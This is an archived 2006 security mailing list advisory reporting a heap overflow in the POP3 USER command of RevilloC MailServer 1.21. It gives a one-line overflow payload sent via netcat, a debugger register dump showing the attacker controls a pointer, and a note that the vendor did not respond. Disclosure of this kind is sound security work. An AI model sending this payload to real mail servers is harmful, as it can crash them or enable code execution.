lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <000701c64205$96bd35d0$0100a8c0@koalacom>
Date: Wed Mar  8 18:17:16 2006
From: securma at morx.org (securma@...x.org)
Subject: RevilloC mail server USER command heap overflow

1-title:
Revilloc mail server "USER" command heap overflow

Product:
Revilloc MailServer and Proxy v 1.21 (http://www.revilloC.com)
The mail server is a central point for emails coming in and going out from 
home or office
The service will work with any standard email client that supports POP3 and 
SMTP.

2-Vulnerability Description:
sending a large buffer  after USER commands
C:\>nc 127.0.0.1 110
+OK RevilloC POP3 Ready
USER  "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a"
causes access violation when reading [dddddddd].
ntdll!wcsncat+0x387:
7C92B3FB   8B0B             MOV ECX,DWORD PTR DS:[EBX]--->EBX pointe to 
"\xdd"x4
ECX   dddddddd
EAX   FFFFFFFF

3-Status:
14/01/2006  Vendor contacted,No response

4-solution:
no patch no solution...use another mail server

5-credit:
securma massine from MorX Security Research Team

6-PoC/Exploit at:
http://www.morx.org/rev.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ